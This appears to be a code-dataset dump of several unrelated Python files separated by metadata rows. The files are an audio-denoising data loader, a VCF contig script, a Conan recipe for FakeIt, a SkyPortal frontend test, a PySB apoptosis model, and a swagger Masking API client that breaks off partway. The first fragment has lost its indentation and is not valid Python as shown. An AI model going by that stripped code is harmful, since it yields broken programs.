gt_seg_wav = gt_wav[start_idx : end_idx]
if len(gt_seg_wav) != hparams.hparams.wav_step_size:
return None, None, None
noisy_seg_wav = noisy_wav[start_idx : end_idx]
if len(noisy_seg_wav) != hparams.hparams.wav_step_size:
return None, None, None
# Data augmentation
aug_steps = np.random.randint(low=0, high=3200)
aug_start_idx = np.random.randint(low=0, high=hparams.hparams.wav_step_size - aug_steps)
aug_end_idx = aug_start_idx+aug_steps
aug_types = ['zero_speech', 'reduce_speech', 'increase_noise']
aug = random.choice(aug_types)
if aug == 'zero_speech':
noisy_seg_wav[aug_start_idx:aug_end_idx] = 0.0
elif aug == 'reduce_speech':
noisy_seg_wav[aug_start_idx:aug_end_idx] = 0.1*gt_seg_wav[aug_start_idx:aug_end_idx]
elif aug == 'increase_noise':
random_seg_wav = random_wav[start_idx : end_idx]
noisy_seg_wav[aug_start_idx:aug_end_idx] = gt_seg_wav[aug_start_idx:aug_end_idx] + (2*random_seg_wav[aug_start_idx:aug_end_idx])
return start_idx, gt_seg_wav, noisy_seg_wav
def crop_mels(self, start_idx, noisy_wav):
end_idx = start_idx + 3200
# Get the segmented wav (0.2 second)
noisy_seg_wav = noisy_wav[start_idx : end_idx]
if len(noisy_seg_wav) != 3200:
return None
# Compute the melspectrogram using librosa
spec = audio.melspectrogram(noisy_seg_wav, hparams.hparams).T # 16x80
spec = spec[:-1]
return spec
def get_segmented_mels(self, start_idx, noisy_wav):
mels = []
if start_idx - 1280 < 0:
return None
# Get the overlapping continuous segments of noisy mels
for i in range(start_idx, start_idx + hparams.hparams.wav_step_size, 640):
m = self.crop_mels(i - 1280, noisy_wav) # Hard-coded to get 0.2sec segments (5 frames)
if m is None or m.shape[0] != hparams.hparams.mel_step_size:
return None
mels.append(m.T)
mels = np.asarray(mels) # Tx80x16
return mels
def get_spec(self, wav):
# Compute STFT using librosa
stft = librosa.stft(y=wav, n_fft=hparams.hparams.n_fft_den, \
hop_length=hparams.hparams.hop_size_den, win_length=hparams.hparams.win_size_den).T
stft = stft[:-1] # Tx257
# Decompose into magnitude and phase representations
mag = np.abs(stft)
mag = audio.db_from_amp(mag)
phase = audio.angle(stft)
# Normalize the magnitude and phase representations
norm_mag = audio.normalize_mag(mag)
norm_phase = audio.normalize_phase(phase)
# Concatenate the magnitude and phase representations
spec = np.concatenate((norm_mag, norm_phase), axis=1) # Tx514
return spec
def add_noise(self, gt_wav, random_wav, desired_snr):
samples = len(gt_wav)
signal_power = np.sum(np.square(np.abs(gt_wav)))/samples
noise_power = np.sum(np.square(np.abs(random_wav)))/samples
k = (signal_power/(noise_power+1e-8)) * (10**(-desired_snr/10))
scaled_random_wav = np.sqrt(k)*random_wav
noisy_wav = gt_wav + scaled_random_wav
return noisy_wav
def load_data(pretrain_path, train_path, noise_path, num_workers, batch_size=4, split='train', sampling_rate=16000, shuffle=False):
dataset = DataGenerator(pretrain_path, train_path, noise_path, sampling_rate, split)
data_loader = DataLoader(dataset, batch_size=batch_size, num_workers=num_workers, shuffle=shuffle)
return data_loader | 36.824074 | 140 | 0.576691 |
613a5ac72130c5363e3225ea79d337f2207eb360 | 677 | py | Python | coordinate_output.py | rmclarklab/B49_B75_B96_haplotypes | 1c554d12c005f7c38701d1621a8afff616333595 | [
"MIT"
] | null | null | null | coordinate_output.py | rmclarklab/B49_B75_B96_haplotypes | 1c554d12c005f7c38701d1621a8afff616333595 | [
"MIT"
] | null | null | null | coordinate_output.py | rmclarklab/B49_B75_B96_haplotypes | 1c554d12c005f7c38701d1621a8afff616333595 | [
"MIT"
] | null | null | null |
def coordinates(vcf, outdir):
chrom_file = open(outdir + "/chrom_file.txt", "w")
with open(vcf, "r") as openvcf:
for line in openvcf:
if line.split("=")[0] == "##contig":
vcfcord = line.split("=")
vcf_scaff = vcfcord[2].split(",")[0]
vcf_scaff_len = int(vcfcord[3].split(">")[0])
if vcf_scaff_len > 100000:
chrom_file.write("%s\t%s\n"%(vcf_scaff, str(vcf_scaff_len)))
if line[0] != "#":
break
chrom_file.close()
################################################################################################# | 42.3125 | 97 | 0.40325 |
b76e34e2b99f263928c43a757db2d7170ac0ed49 | 1,458 | py | Python | conanfile.py | helmesjo/conan-fakeit | daf9622052cdc3b92eea40f2cef7151495fc0d7c | [
"MIT"
] | null | null | null | conanfile.py | helmesjo/conan-fakeit | daf9622052cdc3b92eea40f2cef7151495fc0d7c | [
"MIT"
] | null | null | null | conanfile.py | helmesjo/conan-fakeit | daf9622052cdc3b92eea40f2cef7151495fc0d7c | [
"MIT"
] | null | null | null | from conans import ConanFile
import os
class FakeItConan(ConanFile):
name = 'FakeIt'
version = '2.0.4'
description = 'C++ mocking made easy. A simple yet very expressive, headers only library for c++ mocking.'
settings = None
options = {'integration': ['boost', 'gtest', 'mstest', 'standalone', 'tpunit', 'catch', 'qtest', 'mettle']}
default_options = 'integration=standalone'
url = 'https://github.com/gasuketsu/conan-fakeit.git'
homepage = "https://github.com/eranpeer/FakeIt"
license = 'MIT'
def source(self):
git_args = ' '.join([
'https://github.com/eranpeer/FakeIt.git',
self.name,
])
self.run('git clone %s' % git_args)
self.run('cd %s && git checkout %s' % (self.name, self.version))
def build(self):
# This is a header-only library so no build step required
pass
def package(self):
self.copy(pattern='*.hpp', dst='include', src='FakeIt/include')
self.copy(pattern='*.hpp', dst='config', src='FakeIt/config')
self.copy('license*', dst='licenses', src='FakeIt', ignore_case=True, keep_path=False)
def package_id(self):
# as it is header only, one package is good for everything.
self.info.options.integration = "All"
def package_info(self):
config_dir = os.path.join('config', str(self.options.integration))
self.cpp_info.includedirs = ['include', config_dir]
| 36.45 | 111 | 0.6262 |
d8ad336bcb0afb2feb8a6f83dbe29e03ab52b9a2 | 1,228 | py | Python | skyportal/tests/frontend/test_top_sources.py | dannygoldstein/skyportal | 3f3518136530fcf5bd1787a4c890782164627fce | [
"BSD-3-Clause"
] | null | null | null | skyportal/tests/frontend/test_top_sources.py | dannygoldstein/skyportal | 3f3518136530fcf5bd1787a4c890782164627fce | [
"BSD-3-Clause"
] | null | null | null | skyportal/tests/frontend/test_top_sources.py | dannygoldstein/skyportal | 3f3518136530fcf5bd1787a4c890782164627fce | [
"BSD-3-Clause"
] | null | null | null | import uuid
from skyportal.tests import api
def test_top_sources(driver, user, public_source, public_group, upload_data_token):
obj_id = str(uuid.uuid4())
status, data = api(
'POST',
'sources',
data={
'id': obj_id,
'ra': 50.4,
'dec': 22.33,
'redshift': 2.1,
"altdata": {"simbad": {"class": "RRLyr"}},
'transient': False,
'ra_dis': 2.3,
'group_ids': [public_group.id],
},
token=upload_data_token,
)
assert status == 200
assert data['data']['id'] == obj_id
driver.get(f'/become_user/{user.id}')
driver.get('/')
driver.wait_for_xpath(f'//a[text()="{obj_id}"]')
# Test that front-end views register as source views
driver.click_xpath(f'//a[text()="{obj_id}"]')
driver.wait_for_xpath(f'//div[text()="{obj_id}"]')
driver.click_xpath('//span[text()="Dashboard"]')
driver.wait_for_xpath(f'//*[contains(.,"1 view(s)")]')
# Test that token requests are registered as source views
status, data = api('GET', f'sources/{obj_id}', token=upload_data_token)
assert status == 200
driver.wait_for_xpath(f'//*[contains(.,"2 view(s)")]')
| 30.7 | 83 | 0.571661 |
35088ab8341d36f89559d3b95d8d743869c548b3 | 13,272 | py | Python | log_mito_act/model_798.py | LoLab-VU/Bayesian_Inference_of_Network_Dynamics | 54a5ef7e868be34289836bbbb024a2963c0c9c86 | [
"MIT"
] | null | null | null | log_mito_act/model_798.py | LoLab-VU/Bayesian_Inference_of_Network_Dynamics | 54a5ef7e868be34289836bbbb024a2963c0c9c86 | [
"MIT"
] | null | null | null | log_mito_act/model_798.py | LoLab-VU/Bayesian_Inference_of_Network_Dynamics | 54a5ef7e868be34289836bbbb024a2963c0c9c86 | [
"MIT"
] | null | null | null | # exported from PySB model 'model'
from pysb import Model, Monomer, Parameter, Expression, Compartment, Rule, Observable, Initial, MatchOnce, Annotation, ANY, WILD
Model()
Monomer('Ligand', ['Receptor'])
Monomer('ParpU', ['C3A'])
Monomer('C8A', ['BidU'])
Monomer('BaxM', ['BidM', 'BaxA'])
Monomer('Apop', ['C3pro', 'Xiap'])
Monomer('Fadd', ['Receptor', 'C8pro'])
Monomer('ParpC')
Monomer('Xiap', ['Apop', 'C3A'])
Monomer('C9')
Monomer('C3ub')
Monomer('C8pro', ['Fadd'])
Monomer('C3pro', ['Apop'])
Monomer('CytoCM', ['BaxA'])
Monomer('CytoCC')
Monomer('BaxA', ['BaxM', 'BaxA_1', 'BaxA_2', 'CytoCM'])
Monomer('ApafI')
Monomer('BidU', ['C8A'])
Monomer('BidT')
Monomer('C3A', ['Xiap', 'ParpU'])
Monomer('ApafA')
Monomer('BidM', ['BaxM'])
Monomer('Receptor', ['Ligand', 'Fadd'])
Parameter('bind_0_Ligand_binder_Receptor_binder_target_2kf', 1.0)
Parameter('bind_0_Ligand_binder_Receptor_binder_target_1kr', 1.0)
Parameter('bind_0_Receptor_binder_Fadd_binder_target_2kf', 1.0)
Parameter('bind_0_Receptor_binder_Fadd_binder_target_1kr', 1.0)
Parameter('substrate_binding_0_Fadd_catalyzer_C8pro_substrate_2kf', 1.0)
Parameter('substrate_binding_0_Fadd_catalyzer_C8pro_substrate_1kr', 1.0)
Parameter('catalytic_step_0_Fadd_catalyzer_C8pro_substrate_C8A_product_1kc', 1.0)
Parameter('catalysis_0_C8A_catalyzer_BidU_substrate_BidT_product_2kf', 1.0)
Parameter('catalysis_0_C8A_catalyzer_BidU_substrate_BidT_product_1kr', 1.0)
Parameter('catalysis_1_C8A_catalyzer_BidU_substrate_BidT_product_1kc', 1.0)
Parameter('conversion_0_CytoCC_subunit_d_ApafI_subunit_c_ApafA_complex_2kf', 1.0)
Parameter('conversion_0_CytoCC_subunit_d_ApafI_subunit_c_ApafA_complex_1kr', 1.0)
Parameter('conversion_0_C9_subunit_d_ApafA_subunit_c_Apop_complex_2kf', 1.0)
Parameter('conversion_0_C9_subunit_d_ApafA_subunit_c_Apop_complex_1kr', 1.0)
Parameter('catalysis_0_Apop_catalyzer_C3pro_substrate_C3A_product_2kf', 1.0)
Parameter('catalysis_0_Apop_catalyzer_C3pro_substrate_C3A_product_1kr', 1.0)
Parameter('catalysis_1_Apop_catalyzer_C3pro_substrate_C3A_product_1kc', 1.0)
Parameter('inhibition_0_Xiap_inhibitor_Apop_inh_target_2kf', 1.0)
Parameter('inhibition_0_Xiap_inhibitor_Apop_inh_target_1kr', 1.0)
Parameter('catalysis_0_Xiap_catalyzer_C3A_substrate_C3ub_product_2kf', 1.0)
Parameter('catalysis_0_Xiap_catalyzer_C3A_substrate_C3ub_product_1kr', 1.0)
Parameter('catalysis_1_Xiap_catalyzer_C3A_substrate_C3ub_product_1kc', 1.0)
Parameter('catalysis_0_C3A_catalyzer_ParpU_substrate_ParpC_product_2kf', 1.0)
Parameter('catalysis_0_C3A_catalyzer_ParpU_substrate_ParpC_product_1kr', 1.0)
Parameter('catalysis_1_C3A_catalyzer_ParpU_substrate_ParpC_product_1kc', 1.0)
Parameter('equilibration_0_BidT_equil_a_BidM_equil_b_1kf', 1.0)
Parameter('equilibration_0_BidT_equil_a_BidM_equil_b_1kr', 1.0)
Parameter('catalysis_0_BidM_catalyzer_BaxM_substrate_BaxA_product_2kf', 1.0)
Parameter('catalysis_0_BidM_catalyzer_BaxM_substrate_BaxA_product_1kr', 1.0)
Parameter('catalysis_1_BidM_catalyzer_BaxM_substrate_BaxA_product_1kc', 1.0)
Parameter('self_catalyze_0_BaxA_self_catalyzer_BaxM_self_substrate_2kf', 1.0)
Parameter('self_catalyze_0_BaxA_self_catalyzer_BaxM_self_substrate_1kr', 1.0)
Parameter('self_catalyze_1_BaxA_self_catalyzer_BaxM_self_substrate_1kc', 1.0)
Parameter('pore_formation_0_BaxA_pore_2kf', 1.0)
Parameter('pore_formation_0_BaxA_pore_1kr', 1.0)
Parameter('pore_formation_1_BaxA_pore_2kf', 1.0)
Parameter('pore_formation_1_BaxA_pore_1kr', 1.0)
Parameter('pore_formation_2_BaxA_pore_2kf', 1.0)
Parameter('pore_formation_2_BaxA_pore_1kr', 1.0)
Parameter('transport_0_BaxA_pore_CytoCM_cargo_M_CytoCC_cargo_C_2kf', 1.0)
Parameter('transport_0_BaxA_pore_CytoCM_cargo_M_CytoCC_cargo_C_1kr', 1.0)
Parameter('transport_1_BaxA_pore_CytoCM_cargo_M_CytoCC_cargo_C_1kc', 1.0)
Parameter('Ligand_0', 1000.0)
Parameter('ParpU_0', 1000000.0)
Parameter('C8A_0', 0.0)
Parameter('BaxM_0', 40000.0)
Parameter('Apop_0', 0.0)
Parameter('Fadd_0', 130000.0)
Parameter('ParpC_0', 0.0)
Parameter('Xiap_0', 199500.0)
Parameter('C9_0', 100000.0)
Parameter('C3ub_0', 0.0)
Parameter('C8pro_0', 130000.0)
Parameter('C3pro_0', 21000.0)
Parameter('CytoCM_0', 500000.0)
Parameter('CytoCC_0', 0.0)
Parameter('BaxA_0', 0.0)
Parameter('ApafI_0', 100000.0)
Parameter('BidU_0', 171000.0)
Parameter('BidT_0', 0.0)
Parameter('C3A_0', 0.0)
Parameter('ApafA_0', 0.0)
Parameter('BidM_0', 0.0)
Parameter('Receptor_0', 100.0)
Observable('Ligand_obs', Ligand())
Observable('ParpU_obs', ParpU())
Observable('C8A_obs', C8A())
Observable('BaxM_obs', BaxM())
Observable('Apop_obs', Apop())
Observable('Fadd_obs', Fadd())
Observable('ParpC_obs', ParpC())
Observable('Xiap_obs', Xiap())
Observable('C9_obs', C9())
Observable('C3ub_obs', C3ub())
Observable('C8pro_obs', C8pro())
Observable('C3pro_obs', C3pro())
Observable('CytoCM_obs', CytoCM())
Observable('CytoCC_obs', CytoCC())
Observable('BaxA_obs', BaxA())
Observable('ApafI_obs', ApafI())
Observable('BidU_obs', BidU())
Observable('BidT_obs', BidT())
Observable('C3A_obs', C3A())
Observable('ApafA_obs', ApafA())
Observable('BidM_obs', BidM())
Observable('Receptor_obs', Receptor())
Rule('bind_0_Ligand_binder_Receptor_binder_target', Ligand(Receptor=None) + Receptor(Ligand=None, Fadd=None) | Ligand(Receptor=1) % Receptor(Ligand=1, Fadd=None), bind_0_Ligand_binder_Receptor_binder_target_2kf, bind_0_Ligand_binder_Receptor_binder_target_1kr)
Rule('bind_0_Receptor_binder_Fadd_binder_target', Receptor(Ligand=ANY, Fadd=None) + Fadd(Receptor=None, C8pro=None) | Receptor(Ligand=ANY, Fadd=1) % Fadd(Receptor=1, C8pro=None), bind_0_Receptor_binder_Fadd_binder_target_2kf, bind_0_Receptor_binder_Fadd_binder_target_1kr)
Rule('substrate_binding_0_Fadd_catalyzer_C8pro_substrate', Fadd(Receptor=ANY, C8pro=None) + C8pro(Fadd=None) | Fadd(Receptor=ANY, C8pro=1) % C8pro(Fadd=1), substrate_binding_0_Fadd_catalyzer_C8pro_substrate_2kf, substrate_binding_0_Fadd_catalyzer_C8pro_substrate_1kr)
Rule('catalytic_step_0_Fadd_catalyzer_C8pro_substrate_C8A_product', Fadd(Receptor=ANY, C8pro=1) % C8pro(Fadd=1) >> Fadd(Receptor=ANY, C8pro=None) + C8A(BidU=None), catalytic_step_0_Fadd_catalyzer_C8pro_substrate_C8A_product_1kc)
Rule('catalysis_0_C8A_catalyzer_BidU_substrate_BidT_product', C8A(BidU=None) + BidU(C8A=None) | C8A(BidU=1) % BidU(C8A=1), catalysis_0_C8A_catalyzer_BidU_substrate_BidT_product_2kf, catalysis_0_C8A_catalyzer_BidU_substrate_BidT_product_1kr)
Rule('catalysis_1_C8A_catalyzer_BidU_substrate_BidT_product', C8A(BidU=1) % BidU(C8A=1) >> C8A(BidU=None) + BidT(), catalysis_1_C8A_catalyzer_BidU_substrate_BidT_product_1kc)
Rule('conversion_0_CytoCC_subunit_d_ApafI_subunit_c_ApafA_complex', ApafI() + CytoCC() | ApafA(), conversion_0_CytoCC_subunit_d_ApafI_subunit_c_ApafA_complex_2kf, conversion_0_CytoCC_subunit_d_ApafI_subunit_c_ApafA_complex_1kr)
Rule('conversion_0_C9_subunit_d_ApafA_subunit_c_Apop_complex', ApafA() + C9() | Apop(C3pro=None, Xiap=None), conversion_0_C9_subunit_d_ApafA_subunit_c_Apop_complex_2kf, conversion_0_C9_subunit_d_ApafA_subunit_c_Apop_complex_1kr)
Rule('catalysis_0_Apop_catalyzer_C3pro_substrate_C3A_product', Apop(C3pro=None, Xiap=None) + C3pro(Apop=None) | Apop(C3pro=1, Xiap=None) % C3pro(Apop=1), catalysis_0_Apop_catalyzer_C3pro_substrate_C3A_product_2kf, catalysis_0_Apop_catalyzer_C3pro_substrate_C3A_product_1kr)
Rule('catalysis_1_Apop_catalyzer_C3pro_substrate_C3A_product', Apop(C3pro=1, Xiap=None) % C3pro(Apop=1) >> Apop(C3pro=None, Xiap=None) + C3A(Xiap=None, ParpU=None), catalysis_1_Apop_catalyzer_C3pro_substrate_C3A_product_1kc)
Rule('inhibition_0_Xiap_inhibitor_Apop_inh_target', Xiap(Apop=None, C3A=None) + Apop(C3pro=None, Xiap=None) | Xiap(Apop=1, C3A=None) % Apop(C3pro=None, Xiap=1), inhibition_0_Xiap_inhibitor_Apop_inh_target_2kf, inhibition_0_Xiap_inhibitor_Apop_inh_target_1kr)
Rule('catalysis_0_Xiap_catalyzer_C3A_substrate_C3ub_product', Xiap(Apop=None, C3A=None) + C3A(Xiap=None, ParpU=None) | Xiap(Apop=None, C3A=1) % C3A(Xiap=1, ParpU=None), catalysis_0_Xiap_catalyzer_C3A_substrate_C3ub_product_2kf, catalysis_0_Xiap_catalyzer_C3A_substrate_C3ub_product_1kr)
Rule('catalysis_1_Xiap_catalyzer_C3A_substrate_C3ub_product', Xiap(Apop=None, C3A=1) % C3A(Xiap=1, ParpU=None) >> Xiap(Apop=None, C3A=None) + C3ub(), catalysis_1_Xiap_catalyzer_C3A_substrate_C3ub_product_1kc)
Rule('catalysis_0_C3A_catalyzer_ParpU_substrate_ParpC_product', C3A(Xiap=None, ParpU=None) + ParpU(C3A=None) | C3A(Xiap=None, ParpU=1) % ParpU(C3A=1), catalysis_0_C3A_catalyzer_ParpU_substrate_ParpC_product_2kf, catalysis_0_C3A_catalyzer_ParpU_substrate_ParpC_product_1kr)
Rule('catalysis_1_C3A_catalyzer_ParpU_substrate_ParpC_product', C3A(Xiap=None, ParpU=1) % ParpU(C3A=1) >> C3A(Xiap=None, ParpU=None) + ParpC(), catalysis_1_C3A_catalyzer_ParpU_substrate_ParpC_product_1kc)
Rule('equilibration_0_BidT_equil_a_BidM_equil_b', BidT() | BidM(BaxM=None), equilibration_0_BidT_equil_a_BidM_equil_b_1kf, equilibration_0_BidT_equil_a_BidM_equil_b_1kr)
Rule('catalysis_0_BidM_catalyzer_BaxM_substrate_BaxA_product', BidM(BaxM=None) + BaxM(BidM=None, BaxA=None) | BidM(BaxM=1) % BaxM(BidM=1, BaxA=None), catalysis_0_BidM_catalyzer_BaxM_substrate_BaxA_product_2kf, catalysis_0_BidM_catalyzer_BaxM_substrate_BaxA_product_1kr)
Rule('catalysis_1_BidM_catalyzer_BaxM_substrate_BaxA_product', BidM(BaxM=1) % BaxM(BidM=1, BaxA=None) >> BidM(BaxM=None) + BaxA(BaxM=None, BaxA_1=None, BaxA_2=None, CytoCM=None), catalysis_1_BidM_catalyzer_BaxM_substrate_BaxA_product_1kc)
Rule('self_catalyze_0_BaxA_self_catalyzer_BaxM_self_substrate', BaxA(BaxM=None, BaxA_1=None, BaxA_2=None, CytoCM=None) + BaxM(BidM=None, BaxA=None) | BaxA(BaxM=1, BaxA_1=None, BaxA_2=None, CytoCM=None) % BaxM(BidM=None, BaxA=1), self_catalyze_0_BaxA_self_catalyzer_BaxM_self_substrate_2kf, self_catalyze_0_BaxA_self_catalyzer_BaxM_self_substrate_1kr)
Rule('self_catalyze_1_BaxA_self_catalyzer_BaxM_self_substrate', BaxA(BaxM=1, BaxA_1=None, BaxA_2=None, CytoCM=None) % BaxM(BidM=None, BaxA=1) >> BaxA(BaxM=None, BaxA_1=None, BaxA_2=None, CytoCM=None) + BaxA(BaxM=None, BaxA_1=None, BaxA_2=None, CytoCM=None), self_catalyze_1_BaxA_self_catalyzer_BaxM_self_substrate_1kc)
Rule('pore_formation_0_BaxA_pore', BaxA(BaxM=None, BaxA_1=None, BaxA_2=None, CytoCM=None) + BaxA(BaxM=None, BaxA_1=None, BaxA_2=None, CytoCM=None) | BaxA(BaxM=None, BaxA_1=None, BaxA_2=1, CytoCM=None) % BaxA(BaxM=None, BaxA_1=1, BaxA_2=None, CytoCM=None), pore_formation_0_BaxA_pore_2kf, pore_formation_0_BaxA_pore_1kr)
Rule('pore_formation_1_BaxA_pore', BaxA(BaxM=None, BaxA_1=None, BaxA_2=None, CytoCM=None) + BaxA(BaxM=None, BaxA_1=None, BaxA_2=1, CytoCM=None) % BaxA(BaxM=None, BaxA_1=1, BaxA_2=None, CytoCM=None) | BaxA(BaxM=None, BaxA_1=3, BaxA_2=1, CytoCM=None) % BaxA(BaxM=None, BaxA_1=1, BaxA_2=2, CytoCM=None) % BaxA(BaxM=None, BaxA_1=2, BaxA_2=3, CytoCM=None), pore_formation_1_BaxA_pore_2kf, pore_formation_1_BaxA_pore_1kr)
Rule('pore_formation_2_BaxA_pore', BaxA(BaxM=None, BaxA_1=None, BaxA_2=None, CytoCM=None) + BaxA(BaxM=None, BaxA_1=3, BaxA_2=1, CytoCM=None) % BaxA(BaxM=None, BaxA_1=1, BaxA_2=2, CytoCM=None) % BaxA(BaxM=None, BaxA_1=2, BaxA_2=3, CytoCM=None) | BaxA(BaxM=None, BaxA_1=4, BaxA_2=1, CytoCM=None) % BaxA(BaxM=None, BaxA_1=1, BaxA_2=2, CytoCM=None) % BaxA(BaxM=None, BaxA_1=2, BaxA_2=3, CytoCM=None) % BaxA(BaxM=None, BaxA_1=3, BaxA_2=4, CytoCM=None), pore_formation_2_BaxA_pore_2kf, pore_formation_2_BaxA_pore_1kr)
Rule('transport_0_BaxA_pore_CytoCM_cargo_M_CytoCC_cargo_C', BaxA(BaxM=None, BaxA_1=4, BaxA_2=1, CytoCM=None) % BaxA(BaxM=None, BaxA_1=1, BaxA_2=2, CytoCM=None) % BaxA(BaxM=None, BaxA_1=2, BaxA_2=3, CytoCM=None) % BaxA(BaxM=None, BaxA_1=3, BaxA_2=4, CytoCM=None) + CytoCM(BaxA=None) | BaxA(BaxM=None, BaxA_1=4, BaxA_2=1, CytoCM=None) % BaxA(BaxM=None, BaxA_1=1, BaxA_2=2, CytoCM=None) % BaxA(BaxM=None, BaxA_1=2, BaxA_2=3, CytoCM=None) % BaxA(BaxM=None, BaxA_1=3, BaxA_2=4, CytoCM=5) % CytoCM(BaxA=5), transport_0_BaxA_pore_CytoCM_cargo_M_CytoCC_cargo_C_2kf, transport_0_BaxA_pore_CytoCM_cargo_M_CytoCC_cargo_C_1kr)
Rule('transport_1_BaxA_pore_CytoCM_cargo_M_CytoCC_cargo_C', BaxA(BaxM=None, BaxA_1=4, BaxA_2=1, CytoCM=None) % BaxA(BaxM=None, BaxA_1=1, BaxA_2=2, CytoCM=None) % BaxA(BaxM=None, BaxA_1=2, BaxA_2=3, CytoCM=None) % BaxA(BaxM=None, BaxA_1=3, BaxA_2=4, CytoCM=5) % CytoCM(BaxA=5) >> BaxA(BaxM=None, BaxA_1=4, BaxA_2=1, CytoCM=None) % BaxA(BaxM=None, BaxA_1=1, BaxA_2=2, CytoCM=None) % BaxA(BaxM=None, BaxA_1=2, BaxA_2=3, CytoCM=None) % BaxA(BaxM=None, BaxA_1=3, BaxA_2=4, CytoCM=None) + CytoCC(), transport_1_BaxA_pore_CytoCM_cargo_M_CytoCC_cargo_C_1kc)
Initial(Ligand(Receptor=None), Ligand_0)
Initial(ParpU(C3A=None), ParpU_0)
Initial(C8A(BidU=None), C8A_0)
Initial(BaxM(BidM=None, BaxA=None), BaxM_0)
Initial(Apop(C3pro=None, Xiap=None), Apop_0)
Initial(Fadd(Receptor=None, C8pro=None), Fadd_0)
Initial(ParpC(), ParpC_0)
Initial(Xiap(Apop=None, C3A=None), Xiap_0)
Initial(C9(), C9_0)
Initial(C3ub(), C3ub_0)
Initial(C8pro(Fadd=None), C8pro_0)
Initial(C3pro(Apop=None), C3pro_0)
Initial(CytoCM(BaxA=None), CytoCM_0)
Initial(CytoCC(), CytoCC_0)
Initial(BaxA(BaxM=None, BaxA_1=None, BaxA_2=None, CytoCM=None), BaxA_0)
Initial(ApafI(), ApafI_0)
Initial(BidU(C8A=None), BidU_0)
Initial(BidT(), BidT_0)
Initial(C3A(Xiap=None, ParpU=None), C3A_0)
Initial(ApafA(), ApafA_0)
Initial(BidM(BaxM=None), BidM_0)
Initial(Receptor(Ligand=None, Fadd=None), Receptor_0)
| 79.473054 | 614 | 0.80975 |
f1b82185af4b277720b92d0f1200c1bacbf8b5ea | 15,772 | py | Python | dxm/lib/masking_api/api/application_api.py | experiortec/dxm-toolkit | b2ab6189e163c62fa8d7251cd533d2a36430d44a | [
"Apache-2.0"
] | 5 | 2018-08-23T15:47:05.000Z | 2022-01-19T23:38:18.000Z | dxm/lib/masking_api/api/application_api.py | experiortec/dxm-toolkit | b2ab6189e163c62fa8d7251cd533d2a36430d44a | [
"Apache-2.0"
] | 59 | 2018-10-15T10:37:00.000Z | 2022-03-22T20:49:25.000Z | dxm/lib/masking_api/api/application_api.py | experiortec/dxm-toolkit | b2ab6189e163c62fa8d7251cd533d2a36430d44a | [
"Apache-2.0"
] | 12 | 2019-03-08T19:59:13.000Z | 2021-12-16T03:28:04.000Z | # coding: utf-8
"""
Masking API
Schema for the Masking Engine API # noqa: E501
OpenAPI spec version: 5.1.8
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from dxm.lib.masking_api.api_client import ApiClient
class ApplicationApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def create_application(self, body, **kwargs): # noqa: E501
"""Create application # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_application(body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param Application body: The application to create (required)
:return: Application
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.create_application_with_http_info(body, **kwargs) # noqa: E501
else:
(data) = self.create_application_with_http_info(body, **kwargs) # noqa: E501
return data
def create_application_with_http_info(self, body, **kwargs): # noqa: E501
"""Create application # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_application_with_http_info(body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param Application body: The application to create (required)
:return: Application
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_application" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'body' is set
if self.api_client.client_side_validation and ('body' not in params or
params['body'] is None): # noqa: E501
raise ValueError("Missing the required parameter `body` when calling `create_application`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['api_key'] # noqa: E501
return self.api_client.call_api(
'/applications', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Application', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_application(self, application_id, **kwargs): # noqa: E501
"""Delete application by ID # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_application(application_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int application_id: The ID of the application to delete (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.delete_application_with_http_info(application_id, **kwargs) # noqa: E501
else:
(data) = self.delete_application_with_http_info(application_id, **kwargs) # noqa: E501
return data
def delete_application_with_http_info(self, application_id, **kwargs): # noqa: E501
"""Delete application by ID # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_application_with_http_info(application_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int application_id: The ID of the application to delete (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['application_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_application" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'application_id' is set
if self.api_client.client_side_validation and ('application_id' not in params or
params['application_id'] is None): # noqa: E501
raise ValueError("Missing the required parameter `application_id` when calling `delete_application`") # noqa: E501
collection_formats = {}
path_params = {}
if 'application_id' in params:
path_params['applicationId'] = params['application_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
